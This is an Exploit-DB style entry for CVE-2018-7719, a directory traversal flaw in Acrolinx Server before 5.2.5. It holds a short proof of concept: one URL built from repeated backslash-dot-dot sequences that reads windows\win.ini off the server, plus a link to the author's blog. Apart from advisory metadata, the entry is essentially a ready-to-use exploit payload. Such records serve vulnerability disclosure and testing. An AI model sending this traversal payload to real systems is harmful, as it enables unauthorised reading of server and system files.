Acrolinx Server < 5.2.5 - Directory Traversal

EDB-ID: 44345
Author: Berk Dusunur
Published: 2018-03-26
CVE: CVE-2018-7719
Type: Remote
Platform: Windows
Vulnerable App: N/A

 # CVE: CVE 2018-7719 
# Date: 19.02.2017
# Exploit Author: Berk Dusunur
# Vendor Homepage: www.acrolinx.com
# Version:Before 5.2.5

PoC

Acrolinx dashboard windows works on the server.


http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html

Related Posts